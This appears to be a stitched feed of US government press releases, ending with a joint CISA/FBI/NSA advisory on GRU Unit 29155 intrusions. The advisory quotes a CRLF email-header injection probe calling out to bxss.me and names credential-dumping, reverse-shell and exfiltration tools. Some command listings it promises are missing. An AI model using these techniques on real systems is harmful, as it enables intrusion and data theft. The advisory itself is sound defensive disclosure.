Importation of these items violates the National Firearms Act, and the illegal use of the “Glock” trademark violates federal laws that prohibits trafficking in counterfeit goods
BOSTON — Homeland Security Investigations (HSI) seized more than 350 internet domains that were allegedly used for the illegal importation of switches and silencers from China.
Switches are parts designed to convert semiautomatic pistols into fully automatic machineguns and silencers are devices used to suppress the sound of a firearm when discharged. Possession of these items and their importation from certain countries, including China, are prohibited under the National Firearms Act.
According to the court documents, in August 2023, HSI New England special agents began targeting multiple websites, businesses and individuals selling, offering for sale, importing and exporting machine gun conversion devices in violation of federal law. It is alleged that HSI special agents engaged in undercover purchases from the website domains promoting the sale of NFA-prohibited items — confirming that the domains were being used to sell illegal switches and silencers. The contraband items were then allegedly shipped from China to government-controlled mailboxes in the United States with false descriptions of their contents — such as “necklace” and “toys” — in an effort to conceal the alleged illegal importation.
“Our office remains committed to protecting our communities from the dangers posed by illegal firearms and firearm accessories, wherever the evidence takes us,” said acting U.S. Attorney Joshua S. Levy. “The seizure of these domains is a critical step in disrupting the flow of dangerous contraband that threatens public safety. Those who attempt to exploit online platforms to traffic in highly lethal firearm parts will be held accountable. We will continue to pursue and dismantle these illicit networks wherever they operate to uphold the integrity of our laws and safeguard our communities.”
“These websites represent a large-scale, organized effort to import illegal switches and silencers that turn ordinary firearms into deadly automatic weapons. HSI has worked diligently with our partners to systematically dismantle this network of websites to uphold our nation’s import laws and to preserve public safety,” said HSI new England Special Agent in Charge Michael J. Krol. “HSI cyber investigations work to keep illegal switches and silencers out of the hands of criminals who use them to commit violence and facilitate crime in our communities.”
“The results of this investigation have, to date, resulted in the seizure of over 700 devices which would covert a firearm into a machine gun, 87 illegal suppressors, 59 handguns, 36 long guns, as well as the seizure of 355 websites which were used to facilitate the trafficking of these items. The proliferation of readily available devices which allow the illegal manufacturing of machine guns is a plague on our communities. The Postal Inspection Service is committed to working with our state and federal partners to identify those who use the Postal Service to traffic these weapons, remove these illicit items from the mail, and increase the safety of our communities and the Postal Service employees who serve them,” said U.S. Postal Inspection Service Inspector in Charge Ketty Larco-Ward, who oversees the agency’s Boston Division.
It is further alleged that many of the website domains trafficked counterfeit goods and unlawfully used the Glock, Inc. trademark by offering purported “Glock” switches for sale. In reality, however, Glock, Inc. has never manufactured switches.
HSI special agents ultimately established probable cause to seize for forfeiture more than 350 domains used in connection with the scheme to import switches and silencers in violation of the NFA and laws prohibiting trafficking in counterfeit goods. Visitors to the websites will now be directed to a landing page indicating that the domain has been seized:
Krol, Levy and Larco-Ward made the announcement Sept. 11. HSI’s investigation was led by HSI New England’s Boston Cyber Crimes group. Valuable assistance in the investigation was provided by U.S. Customs and Border Protection; Bureau of Alcohol, Tobacco, Firearms and Explosives; the Massachusetts State Police and the Massachusetts Attorney General’s Office. Glock, Inc. fully cooperated with the government’s investigation.
HSI is committed to working with its partners to pursue cybercriminals on all fronts. We do this to help maintain internet integrity and protect American consumers, businesses and the public. Persistence, cooperation and ingenuity are keys to combating this global crime. Within HSI, special agents, computer forensics agents and analysts, cyber operations officers, intelligence analysts and cybersecurity specialists work together to investigate cybercrime and develop new techniques to detect, disrupt and deanonymize cybercriminals.
As observed through multiple election cycles, foreign actors and cybercriminals continue to spread false information through various platforms to manipulate public opinion, discredit the electoral process, and undermine confidence in U.S. democratic institutions. The FBI and CISA continue to work closely with federal, state, local, and territorial election partners and provide services and information to safeguard U.S. voting processes and maintain the resilience of the U.S. elections.
“This PSA is to educate people that false claims of election infrastructure compromise, like a voter registration database hack, may be spread by foreign actors and to not accept claims of intrusion at face value, as these claims may be meant to influence public opinion and negatively impact the American people’s confidence in our democratic process,” said CISA Senior Advisor Cait Conley.”
“The FBI continues to investigate any claims of malicious cyber actors’ attempts to target U.S. elections,” said FBI Cyber Division, Deputy Assistant Director Cynthia Kaiser. “Through our investigations, the FBI has identified that malicious actors commonly attempt to undermine public confidence in US elections by grossly exaggerating about obtaining U.S. voter information. Today’s announcement urges the American public to critically evaluate claims of hacked or leaked voter information and remember that most voter registration information is available to the public. We at the FBI remain committed to continuing to share information to counter false claims and help election officials further secure election processes.”
###
About CISA
As the nation’s cyber defense agency and national coordinator for critical infrastructure security, the Cybersecurity and Infrastructure Security Agency leads the national effort to understand, manage, and reduce risk to the digital and physical infrastructure Americans rely on every hour of every day.
NEW YORK CITY – On September 12, the U.S. Department of Homeland Security (DHS) held an awards ceremony hosted by U.S. Citizenship and Immigration Services (USCIS), where 158 employees received a Secretary’s Award in recognition of their outstanding contributions to the Department’s mission.
“Every single day, with great determination, integrity, and skill, the 268,000 men and women of the Department of Homeland Security ensure the safety and security of the American people,” said Secretary of Homeland Security Alejandro N. Mayorkas. “Thanks to these extraordinary public servants, our shores, harbors, skies, cyberspace, and borders are protected; fentanyl and other deadly drugs are prevented from entering our country; communities are able to recover and rebuild after a natural disaster; the scourges of human trafficking, forced labor, and online exploitation are mitigated; and so much more. The individuals we recognize today with our Department’s highest honor, the Secretary’s Award, reflect the very best of DHS – and in their selfless dedication to mission, the very best of public service.”
The DHS Secretary’s Awards are an annual program that recognizes the extraordinary individual and collective achievements of the workforce. The 158 awardees recognized in today’s ceremony represent USCIS, the Federal Law Enforcement Training Centers (FLETC), Transportation Security Administration (TSA), U.S. Coast Guard (USCG), Immigration and Customs Enforcement (ICE), Cybersecurity and Infrastructure Security Agency (CISA), U.S. Customs and Border Protection (CBP), Federal Emergency Management Agency (FEMA) and the Office of Intelligence and Analysis (I&A).
“In recognizing these outstanding DHS personnel with a Secretary’s Award, we recognize all our talented personnel; the achievements of one are not possible without the contributions of others,” added Secretary Mayorkas. “We also express our appreciation to their families and loved ones; when one serves, the family serves too.”
This year’s award recipients developed and issued policy and procedures associated with a whole-scale transition to a new pay system for TSA; launched a series of coordinated and collaborative initiatives, operations and investigations targeting Transnational Criminal Organizations (TCOs) and national security threats operating and transiting through the Darien Gap region; arrested over 8,000 human smugglers, produced over 5,000 intelligence reports, and seized over $38M USD in real property; ensured over 2,300 vital alerts and warnings were provided to owners and operators of critical infrastructure to protect against cyberattacks; among many other achievements.
This year, DHS is holding nine Secretary’s Awards ceremonies across the country, honoring over 1,700 employees, the most annual awardees ever.
Last year, Secretary Mayorkas unveiled 12 priorities for the Department, including a commitment to champion the workforce and transform the employee experience. DHS has the third largest workforce of any federal department, behind the Department of Defense and Department of Veterans Affairs. The Department is home to more than 92,000 sworn law enforcement officers, the greatest number of law enforcement officers of any department in the federal government. DHS has committed to increasing the representation of women in law enforcement or related occupations at DHS to 30% by 2030. Over 54,000 veterans, or nearly 21% of the workforce, continue serving their country by working at DHS.
DHS operational components interact more frequently on a daily basis with the American public than any other federal department, from travelers moving through air, land, and sea ports of entry, to businesses importing goods into the country, to immigrants applying for services. To learn more about the impact DHS makes every day, visit: DHS.gov/TodayDHSWill.
Last year, DHS improved the efficiency of processing noncitizens at the Southwest Border, deployed across the country to respond to natural disasters, investigated cybercrimes, created a new streamlined process for adjudicating asylum applications, safely and securely resettled nearly 90,000 evacuated Afghans in the United States, provided resources for organizations to enhance their cybersecurity resilience, established a process for Ukrainian nationals seeking refuge, secured the 2022 midterm elections, and demonstrated heroism by acting quickly and courageously to save lives in harrowing circumstances.
Three nations will develop an early warning pilot to assess disruptions to supply chains in the telecommunications sector
WASHINGTON – This week, the U.S. Department of Homeland Security (DHS), the United Kingdom (U.K.)’s Department for Business and Trade of the United Kingdom of Great Britain and Northern Ireland, and Australia’s Department of Industry, Science, and Resources established the United States-United Kingdom-Australia Supply Chain Resilience Cooperation Group to enhance efforts to combat threats to critical supply chains.
The Supply Chain Resilience Cooperation Group will develop an early warning pilot focused on the telecommunications sector. This sector, including satellite and subsea communications, is critical to the shared economic security of the three participating nations. The pilot program will identify and monitor potential disruptions to supply chains in the telecommunications sector. It will also enhance global understanding of the vulnerabilities in the sector and develop communications channels for sharing this information and facilitating cooperative responses to disruptions.
Telecommunications infrastructure is vital to the distribution of public safety information, emergency services, and the day to day lives of many citizens. For example, undersea fiberoptic cables carry over 95% of transoceanic data traffic without which smartphones, financial networks, and communications systems would cease to function reliably.
“The resilience of our critical supply chains is a homeland security and economic security imperative,” said Secretary of Homeland Security Alejandro N. Mayorkas. “Collaboration with international partners allows us to anticipate and mitigate disruptions before they occur. Our new U.S.-U.K.-Australia Supply Chain Resilience Cooperation Group will help ensure that our communities continue to have the essential goods and services they need, when they need them.”
The U.K. and Australia are the first countries to formalize cooperation with DHS’ Supply Chain Resilience Center through a Memorandum of Understanding. Established in 2023, the Supply Chain Resilience Center works to analyze supply chain vulnerabilities alongside federal partners and private sector stakeholders to mitigate potential disruptions, ensuring the delivery of essential goods and services to American citizens.
The U.K’s Economic Security and Supply Chain Resilience Directorate, housed in the Department for Business and Trade, oversees efforts to mitigate supply-side risks to the U.K. economy and support greater long-term resilience. Australia’s Office of Supply Chain Resilience, housed in the Department for Industry, Science, and Resources, focuses on mitigating supply chain vulnerabilities and ensuring ongoing access to essential goods and services. These offices participating in the Memorandum of Understanding are not direct DHS counterparts, but their mission areas include significant overlap with respect to supply chain resilience issues. This partnership reflects the multifaceted nature of supply chain challenges and draws on the wide-ranging expertise represented between the three participants.
“The United States has recently felt effects of supply chain disruptions around the world, which is why working with our allies to secure our supply chains is more critical than ever,” said Under Secretary for Policy Robert Silvers. “By establishing the U.S.- U.K.-Australia Supply Chain Resilience Cooperation Group and developing our early warning system, we are setting the groundwork to anticipate supply chain disruptions and build resilience before our nations are affected by shortages of critical goods.”
“Strong supply chains are essential for our economic security, and we cannot rely purely on the invisible hand of the market to deliver them,” said U.K. Minister for Trade Policy and Economic Security Douglas Alexander. “Improved cooperation between our three nations will help us to identify and mitigate disruption to supply chains and better support U.K. businesses trading internationally.”
The Supply Chain Resilience Center, established in November 2023, serves as a hub for key U.S. government and industry partners to come together to anticipate, analyze, and plan for potential supply chain disruptions. It is supported by personnel from DHS Headquarters, Federal Emergency Management Agency (FEMA), U.S. Coast Guard (USCG), U.S. Customs and Border Protection (CBP), Immigration and Customs Enforcement (ICE), Homeland Security Investigations (HSI), Transportation Security Administration (TSA), and Cybersecurity and Infrastructure Security Agency (CISA) who bring extensive supply chain knowledge and expertise, and who are in regular contact with industry and other stakeholders.
During emergency events, the Department of Homeland Security (DHS) works with its federal, state, local, and non-governmental partners to support the needs of the people in the areas that may be impacted.
In such circumstances, U.S. Immigration and Customs Enforcement (ICE) and U.S. Customs and Border Protection (CBP) remind the public that sites that provide emergency response and relief are considered protected areas. To the fullest extent possible, ICE and CBP do not conduct immigration enforcement activities at protected areas such as along evacuation routes, sites used for sheltering or the distribution of emergency supplies, food or water, or registration sites for disaster-related assistance or the reunification of families and loved ones.
At the request of FEMA or local and state authorities, ICE and CBP may help conduct search and rescue, air traffic de-confliction and public safety missions. ICE and CBP provide emergency assistance to individuals regardless of their immigration status. DHS officials do not and will not pose as individuals providing emergency-related information as part of any enforcement activities.
DHS is committed to ensuring that every individual who seeks shelter, aid, or other assistance as a result of a natural disaster or emergency event is able to do so regardless of their immigration status.
DHS carries out its mission without discrimination on the basis of race, religion, gender, sexual orientation or gender identity, ethnicity, disability or political associations, and in compliance with law and policy.
For information about filing a complaint with the DHS Office for Civil Rights and Civil Liberties about these matters, please visit our Make a Civil Rights Complaint page.
“Election officials around the country are unwavering in their commitment to enhance the cyber and physical security of election infrastructure to meet an evolving threat environment. As election officials and their teams enter into final preparations for November, these checklists help highlight some of the most common threat vectors, security practices, and resilience measures for consideration,” said CISA Senior Advisor, Cait Conley.
These checklists provide a series of questions to guide preparation for potential cyber and physical security incidents that may impact election infrastructure. They help election officials identify areas to potentially enhance physical security, operational resilience, and cybersecurity at election infrastructure facilities and take action to implement low- or no-cost options in the short term.
For more information, please click here and check out #Protect2024 for the latest information regarding election security.
###
About CISA
As the nation’s cyber defense agency and national coordinator for critical infrastructure security, the Cybersecurity and Infrastructure Security Agency leads the national effort to understand, manage, and reduce risk to the digital and physical infrastructure Americans rely on every hour of every day.
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and National Security Agency (NSA) assess that cyber actors affiliated with the Russian General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155) are responsible for computer network operations against global targets for the purposes of espionage, sabotage, and reputational harm since at least 2020. GRU Unit 29155 cyber actors began deploying the destructive WhisperGate malware against multiple Ukrainian victim organizations as early as January 13, 2022. These cyber actors are separate from other known and more established GRU-affiliated cyber groups, such as Unit 26165 and Unit 74455.
To mitigate this malicious cyber activity, organizations should take the following actions today:
Prioritize routine system updates and remediate known exploited vulnerabilities.
Segment networks to prevent the spread of malicious activity.
Enable phishing-resistant multifactor authentication (MFA) for all externally facing account services, especially for webmail, virtual private networks (VPNs), and accounts that access critical systems.
This Cybersecurity Advisory provides tactics, techniques, and procedures (TTPs) associated with Unit 29155 cyber actors—both during and succeeding their deployment of WhisperGate against Ukraine—as well as further analysis (see Appendix A) of the WhisperGate malware initially published in the joint advisory, Destructive Malware Targeting Organizations in Ukraine, published February 26, 2022.
FBI, CISA, NSA and the following partners are releasing this joint advisory as a collective assessment of Unit 29155 cyber operations since 2020:
U.S. Department of the Treasury
U.S. Department of State (Rewards for Justice)
U.S. Cyber Command Cyber National Mission Force (CNMF)
Netherlands Defence Intelligence and Security Service (MIVD)
Czech Military Intelligence (VZ)
Czech Republic Security Information Service (BIS)
German Federal Office for the Protection of the Constitution (BfV)
Estonian Internal Security Service (KAPO)
Latvian State Security Service (VDD)
Security Service of Ukraine (SBU)
Computer Emergency Response Team of Ukraine (CERT-UA)
For a downloadable copy of indicators of compromise (IOCs):
Technical Details
Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 15. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.
GRU Unit 29155: Cyber Component
FBI, NSA, and CISA assess Unit 29155 is responsible for attempted coups, sabotage and influence operations, and assassination attempts throughout Europe. Unit 29155 expanded their tradecraft to include offensive cyber operations since at least 2020. Unit 29155 cyber actors’ objectives appear to include the collection of information for espionage purposes, reputational harm caused by the theft and leakage of sensitive information, and systematic sabotage caused by the destruction of data [T1485].
FBI assesses the Unit 29155 cyber actors to be junior active-duty GRU officers under the direction of experienced Unit 29155 leadership. These individuals appear to be gaining cyber experience and enhancing their technical skills through conducting cyber operations and intrusions. Additionally, FBI assesses Unit 29155 cyber actors rely on non-GRU actors, including known cyber-criminals and enablers to conduct their operations.
Cybersecurity Industry Tracking
The cybersecurity industry provides overlapping cyber threat intelligence, IOCs, and mitigation recommendations related to Unit 29155 cyber actors. While not all encompassing, the following are the most notable threat group names related under MITRE ATT&CK G1003 and commonly used within the cybersecurity community.
Cadet Blizzard (formerly known as DEV-0586 by Microsoft)[1],[2]
Ember Bear (also known as Bleeding Bear by CrowdStrike)[3]
Note: Cybersecurity companies have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the U.S. Government’s understanding for all activity related to these groupings.
Victimization
In addition to WhisperGate and other incidents against Ukraine, Unit 29155 cyber actors have conducted computer network operations against numerous members of the North Atlantic Treaty Organization (NATO) in Europe and North America, as well as countries in Europe, Latin America, and Central Asia. The activity includes cyber campaigns such as website defacements, infrastructure scanning, data exfiltration, and data leak operations. These actors sell or publicly release exfiltrated victim data obtained from their compromises. Since early 2022, the primary focus of the cyber actors appears to be targeting and disrupting efforts to provide aid to Ukraine.
To date, the FBI has observed more than 14,000 instances of domain scanning across at least 26 NATO members and several additional European Union (EU) countries. Unit 29155 cyber actors have defaced victim websites and used public website domains to post exfiltrated victim information.
Whether through offensive operations or scanning activity, Unit 29155 cyber actors are known to target critical infrastructure and key resource sectors, including the government services, financial services, transportation systems, energy, and healthcare sectors of NATO members, the EU, Central American, and Asian countries.
TTP Overview
Reconnaissance
Unit 29155 cyber actors have been observed targeting IP ranges [T1595.001] used within multiple government and critical infrastructure organizations. The following are publicly available tools these cyber actors have used for scanning [T1595] and vulnerability exploit efforts. Unit 29155 cyber actors were not observed using these tools outside of their intended purpose. Note: Use of these tools should not be attributed as malicious without analytical evidence to support threat actor use and/or control.
Acunetix: Unit 29155 cyber actors leveraged both Acunetix and Nmap to identify open ports, services, and vulnerabilities for networks [T1595.002].[6]
Amass: Unit 29155 cyber actors leveraged both Amass and VirusTotal to obtain subdomains for target websites [T1590.002].[7]
Nmap: Once Unit 29155 cyber actors gained access to victim internal networks, they further used Nmap (via the Nmap Scripting Engine [NSE]) to write custom scripts for discovering and scanning other machines [T1046].
Shodan: Unit 29155 cyber actors used Shodan to identify hosts with a specific set of vulnerabilities or device types [T1596.005].[12]
Additionally, Unit 29155 cyber actors have used infrastructure configured with OpenVPN configuration [T1572] over port 1194, and in some instances, to perform Active Directory (AD) enumeration. Adminer in combination with Impacket and ldapdomaindump were tools used for gathering information on AD. Once active devices are found, Unit 29155 cyber actors look for vulnerabilities to exploit. For example, the Acunetix vulnerability scanning tool has been used for gathering information on potential vulnerabilities such as blind cross-site scripting, as shown in the following commands:
GET /index.php?log=to@example.com>%0d%0abcc:009247.3183-377.3183.1bf6c.19446.2@bxss.me
As the cyber actors perform reconnaissance on victim networks and discover vulnerabilities within victim web servers or machines, they obtain CVE exploit scripts from GitHub repositories and use them against victim infrastructure [T1588.005]. Unit 29155 cyber actors have been observed obtaining the respective exploit scripts for, but not exploiting, the following CVEs:
Analysis concluded Unit 29155 cyber actors have exploited the following CVEs for initial access [T1190], as detailed throughout this advisory:
Resource Development
Rather than build custom solutions, Unit 29155 cyber actors use common red teaming techniques and publicly available tools to conduct cyber operations. As a result, many TTPs overlap with those of other cyber actors, which can lead to misattribution.
Unit 29155 actors and their cyber-criminal affiliates commonly maintain accounts on dark web forums; this has provided the opportunity to obtain various hacker tools such as malware and malware loaders [T1588.001] like Raspberry Robin and SaintBot. While Unit 29155 cyber actors are best known for their use of WhisperGate malware against Ukraine, the use of WhisperGate is not unique to the group. Technical analysis can be found in Appendix A: WhisperGate Malware Analysis.
Initial Access
Unit 29155 cyber actors are known to use VPNs to anonymize their operational activity. These cyber actors commonly attempt to exploit weaknesses in internet-facing systems, like the CVEs listed above, to initially access networks. In one instance, Unit 29155 cyber actors exploited CVE-2021-33044 and CVE-2021-33045 on Dahua IP cameras to bypass identity authentication.
Lateral Movement
Unit 29155 cyber actors have used Shodan to scan for Internet of Things (IoT) devices, using exploitation scripts to authenticate to IP cameras with default usernames and passwords [T1078.001], and exfiltrating images [T1125] (JPG files). Attempts are then made to perform remote command execution via web to vulnerable IP cameras; if successful, cyber actors would dump configuration settings and credentials in plaintext (as shown in Table 1 below) [T1552.001].
Appendix B: Indicators of Compromise lists threat actor IP addresses associated with the activity detailed in this section.
Note: These events are independent and not correlated as a single timeline of compromise.
Event
Victim Observation
Web requests observed from victim infrastructure
These requests are likely intended to dump configuration settings and credentials [T1003]:
In addition, incident analysis identified the general observations listed below on victim infrastructure. Each event should be considered independent and may have been used by Unit 29155 cyber actors against multiple victims at different dates and timeframes. Appendix B: Indicators of Compromise lists IOCs associated with the observations in Table 1 and below.
In one instance shortly following a deployment of WhisperGate malware, Unit 29155 cyber actors exfiltrated data to mega[.]nz using Rclone [T1567.002].
Unit 29155 cyber actors used a Pass-the-Hash [T1550.002] via ProxyChains.
Cyber actors performed SSH and SSHPass executions.
Cyber actors initiated a web request and executed commands via ProxyChains. This included obtaining NT hashes via Server Message Block (SMB) using smbclient, executing Windows Management Instrumentation (WMI) with hashes, and making web requests with resources i.php and tunnel.jsp. In one instance, cyber actors used smbclient via ProxyChains to access internal network shares, and subsequently PSQL and MySQL clients to access internal databases.
Cyber actors used Impacket for post-exploitation and lateral movement. The script secretsdump.py was used from the Impacket framework to obtain domain credentials, while psexec.py was subsequently used to move laterally within a victim network.
Cyber actors used ntlmrelayx.py via Impacket and krbrelayx.py, which requires Impacket to function.
Cyber actors used Responder.py.
Cyber actors used su-bruteforce to brute force a selected user using the su command.
Cyber actors used BloodHound, an open source AD reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.
Cyber actors used CrackMapExec via ProxyChains with SMB protocol targeting internal victim IP addresses. This open source post-exploitation tool automates assessing the security of large AD networks.
Cyber actors used LinPEAS, an open source script designed to automate the process of searching for potential privilege escalation vulnerabilities on a Linux victim.
Cyber actors used GO Simple Tunnel (GOST) (MD5: 896e0f54fc67d72d94b40d7885f10c51) for 30 days within one incident and against additional victims on various occasions. GOST is a tunneling tool designed to establish secure connections between clients and servers, allowing for secure data transmission over untrusted networks.
Cyber actors used Through the Wire against a victim’s internet-facing Confluence server. Through the Wire is a proof of concept[14] exploit for CVE-2022-26134, an OGNL injection vulnerability allowing an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance. All versions of Confluence Server and Data Center prior to the fixed versions listed by Atlassian are affected by this vulnerability.[15] A reverse shell over HTTPS was used to communicate over listening host on port 8081.
Cyber actors initiated Nmap scans on localized web servers.
Cyber actors performed lateral movement from compromised web servers to exploit a corporate Microsoft Windows network, commonly using psexec.py from the Impacket framework. The script secretsdump.py from the Impacket framework was used to obtain domain credentials.
Cyber actors may have used Raspberry Robin malware in the role of an access broker [T1588.001].
Cyber actors targeted victims’ Microsoft Outlook Web Access (OWA) infrastructure with password spraying to obtain valid usernames and passwords [T1110.003].
Command and Control
Infrastructure
Since at least 2020, Unit 29155 cyber actors have used virtual private servers (VPSs) [T1583.003] to host their operational tools, perform reconnaissance, exploit victim infrastructure, and exfiltrate victim data. Use of VPSs are common due to the associated IP addresses not identifying their true country of origin.
Post-Exploitation
When an exploit is successfully executed on a victim system, the actors can then launch a Meterpreter payload [T1105], which commonly uses a reverse Transmission Control Protocol (TCP) connection to initiate communication with the threat actors’ infrastructure [T1095]. In one instance, an established reverse TCP session was observed from victim to actor infrastructure via the following ports:
1234
1851
43221
443
4444
4688
5432
8080
8081
8082
8084
8085
8088
8089
8090
8443
8487
8888
Additional observations were collected from victim engagement and analysis, including:
Use of the Metasploit Framework to search for and/or access modules such as mysql, postgres, and ssh software and features.
Use of Meterpreter and Netcat to execute reverse shells over ports such as 8081.
Use of Impacket.
Use of PHP (exp_door v1.0.2, b374k, WSO 4.0.5) and the P.A.S. web shells [T1505.003], likely for initial access.
Use of reGeorg or Neo-reGeorg to set up a proxy to tunnel network traffic following compromise of a victim website, as well as use of ProxyChains to run Nmap within the network.
Encrypted Communication
Once Unit 29155 cyber actors gain access to the victims’ internal network, the victims have observed:
Using Domain Name System (DNS) tunneling tools, such as dnscat/2 and Iodine, to tunnel IPv4 network traffic [T1071.004]. For example, Iodine was used to tunnel data via dns.test658324901domain.me.
Configuring a proxy within the victim infrastructure and executing commands within the network via ProxyChains. ProxyChains—a tool used to route internal traffic through a series of proxies [T1090.003]—has been used to provide further anonymity and modify system configuration to force network traffic through chains of SOCKS5 proxies and respective ports. The following ports used by actor infrastructure include:
1080
1333
13381
13391
13666
13871
1448
1888
3130
3140
4337
50001
8079
Using the GOST open source tunneling tool (via SOCKS5 proxy) named java, as detailed in the following running processes in victim incident response results:
In several instances, analysis identified Unit 29155 cyber actors compressing victim data [T1560] (e.g., the entire filesystem, select file system artifacts or user data, and/or database dumps) to send back to their infrastructure. These cyber actors commonly use the command-line program Rclone to exfiltrate data to a remote location from victim infrastructure.
Unit 29155 cyber actors have exfiltrated Windows processes and artifacts, such as Local Security Authority Subsystem Service (LSASS) memory dumps [T1003.001], Security Accounts Manager (SAM) files [T1003.002], and SECURITY and SYSTEM event log files [T1654]. As seen in victim incident response results, actor infrastructure has also been used to compromise multiple mail servers [T1114] and exfiltrate mail artifacts, such as email messages, using PowerShell [T1059.001] via the following command:
See Table 3 to Table 14 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Unit 29155 cyber actors have used Amass and VirusTotal to obtain information about victims’ DNS for possible use during targeting, such as subdomains for target websites.
Unit 29155 cyber actors use publicly available scanning tools to enable their discovery of IoT devices and exploitable vulnerabilities. Tools leveraged for scanning include Acunetix, Amass, Droopescan, eScan, and JoomScan.
Unit 29155 cyber actors have used VPSs to host their operational tools, perform reconnaissance, exploit victim infrastructure, and exfiltrate victim data.
Unit 29155 cyber actors obtain publicly available malware and malware loaders to support their operations. For example, analysis suggests Raspberry Robin malware may have been used in the role of an access broker.
Once Unit 29155 cyber actors gained access to victim internal networks, they further used Nmap (via the NSE) to write custom scripts for discovering and scanning other machines.
Unit 29155 cyber actors have used their infrastructure to compromise multiple victims’ mail servers and exfiltrate mail artifacts, such as email messages.
Unit 29155 cyber actors compress victim data (e.g., the entire filesystem, select file system artifacts or user data, and/or database dumps) to send back to their infrastructure.
Unit 29155 cyber actors executed commands via ProxyChains—a tool used to route internal traffic through a series of proxies.
ProxyChains was also used to provide further anonymity and modify system configuration to force network traffic through chains of SOCKS5 proxies and respective ports.
When an exploit is successfully executed on a victim system, Unit 29155 cyber actors are known to launch the Meterpreter payload to initiate communication with their actor-controlled systems.
Unit 29155 cyber actors have used infrastructure configured with OpenVPN configuration to tunnel traffic over a single port (1194), VPNs, and GOST to anonymize their operational activity.
Table 13: Exfiltration
Technique Title
ID
Use
Exfiltration Over Web Service: Exfiltration to Cloud Storage
Unit 29155 cyber actors’ objectives include the destruction of data.
Mitigations
The authoring agencies recommend organizations implement the mitigations supplied below to improve organizational cybersecurity posture based on threat actor activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
Limit Adversarial Use of Common Vulnerabilities
Prioritize patching to CISA’s Known Exploited Vulnerabilities Catalog, especially for CVEs identified in this advisory, and then critical and high vulnerabilities that allow for remote code execution on internet-facing devices.
Conduct regular automated vulnerability scans to perform vulnerability assessments on all network resources based on threat actor behaviors and known exploitable vulnerabilities (CISA CPG 1.E).
Limit exploitable services on internet-facing assets, such as email and remote management protocols (CISA CPGs 2.M, 2.W). Where necessary services must be exposed, such as services hosted in a demilitarized zone (DMZ), implement the appropriate compensatory controls to prevent common forms of abuse and exploitation. Disable all unnecessary operating system applications and network protocols to combat adversary enumeration. For additional guidance, see CISA Insights: Remediate Vulnerabilities for Internet-Accessible Systems.
U.S. organizations can utilize a range of CISA services at no cost, including vulnerability scanning and testing, to help organizations reduce exposure to threats. CISA Cyber Hygiene services can provide additional review of internet-accessible assets and provide regular reports on steps to take to mitigate vulnerabilities. Email vulnerability@cisa.dhs.gov with the subject line, “Requesting Cyber Hygiene Services,” to get started.
Software manufacturers, vendors, and consumers are encouraged to review CISA and NIST’s Defending Against Supply Chain Attacks. This publication provides an overview of software supply chain risks and recommendations for how software customers and vendors can use the NIST Cyber Supply Chain Risk Management (C-SCRM) Framework and the Secure Software Development Framework (SSDF) to identify, assess, and mitigate software supply chain risks. CISA recommends comprehensive mitigations for supply chain incident reporting, vulnerability disclosing (e.g., security.txt), and choosing a trusted supplier or vendor that observes proper cyber security hygiene (CISA CPG 1.G, 1.H, 1.I) to defend against upstream attacks.
Deploy Protective Controls and Architecture
Implement network segmentation. Network segmentation can help prevent lateral movement by controlling traffic flows between—and access to—various subnetworks (CISA CPG 2.F). Best practice mitigations include updating Identity and Access Management (IAM) and employing phishing-resistant MFA for all devices and accounts identified as organizational assets. For additional guidance, see CISA and NSA’s IAM Recommended Best Practices Guide for Administrators (CISA CPG 2.H).
Verify and ensure that sensitive data, including credentials, are not stored in plaintext and can only be accessed by authenticated and authorized users. Credentials must be stored in a secure manner, such as with a credential/password manager to protect from malicious enumeration (CISA CPG 2.L).
Disable and/or restrict use of command line and PowerShell activity. Update to the latest version and uninstall all earlier PowerShell versions (CISA CPG 2.N).
Implement a continuous system monitoring program, such as security information and event management (SIEM) or endpoint detection and response (EDR) solutions, to comprehensively log and review all authorized external access connections. This logging will better ensure the prompt detection of misuse or abnormal activity (CISA CPG 2.T).
Monitor for unauthorized access attempts and programming anomalies through comprehensive logging that is secured from modification, such as limiting permissions and adding redundant remote logging (CISA CPG 2.U). Security appliances should be set to detect and/or block Impacket framework indicators, PSExec or WMI commands, and suspicious PowerShell commands for timely identification and remediation.
Identify any use of outdated or weak encryption, update these to sufficiently strong algorithms, and consider the implications of post-quantum cryptography (CISA CPG 2.K). Use properly configured and up-to-date Secure Socket Layer (SSL)/Transport Layer Security (TLS) to protect data in transit.
Security Controls
In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
Select an ATT&CK technique described in this advisory (see Table 3 to Table 14).
Align your security technologies against the technique.
Test your technologies against the technique.
Analyze your detection and prevention technologies’ performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program, including people, processes, and technologies, based on the data generated by this process.
The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
To report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory, contact your local FBI field office or CISA’s 24/7 Operations Center at Report@cisa.gov or (888) 282-0870. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov.
Disclaimer
